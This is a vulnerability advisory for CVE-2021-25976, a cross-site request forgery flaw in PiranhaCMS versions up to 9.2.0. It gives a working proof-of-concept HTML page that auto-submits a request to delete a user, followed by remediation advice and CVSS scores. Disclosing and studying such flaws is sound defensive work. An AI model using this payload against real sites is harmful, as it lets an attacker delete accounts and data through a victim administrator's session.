icon

We found results for “

CVE-2021-25976

Date: November 16, 2021

Overview

In PiranhaCMS, versions 4.0.0-alpha1 to 9.2.0 are vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder etc., when an ID is known.

Details

PiranhaCMS is vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder etc., when an ID is known.

PoC Details

Host the below HTML page on a different web server.
When a user accesses the malicious HTML page, a request to delete the user is issued.
Once the response is received for the request, we can see that the user was successfully deleted.

PoC Code

<html>
  <body>
    <form action="http://piranhacms.com:5000/manager/user/delete/99b29f16-0bfa-477b-9d5f-b34efbbf2b8a">
      <input type="submit" value="Submit request" />
    </form>
  <script>document.forms[0].submit()</script>
  </body>
</html>

Affected Environments

Vulnerable GitHub Versions: v4.0.0-alpha1 to v9.2; Vulnerable Nuget Versions: 4.0.0-alpha1 to 9.2.0

Remediation

According to the HTTP specifications, GET requests should be idempotent (non state changing).
When performing actions such as deleting users, use a different HTTP method, such as DELETE.

Prevention

Update to Piranha.Manager version 10.0.0

Language: C#

Good to know:

icon
icon

Cross-Site Request Forgery (CSRF)

CWE-352
icon

Upgrade Version

Upgrade to version Piranha.Manager - 10.0.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): High
Authentication (AU): None
Confidentiality (C): None
Integrity (I): Partial
Availability (A): Partial
Additional information: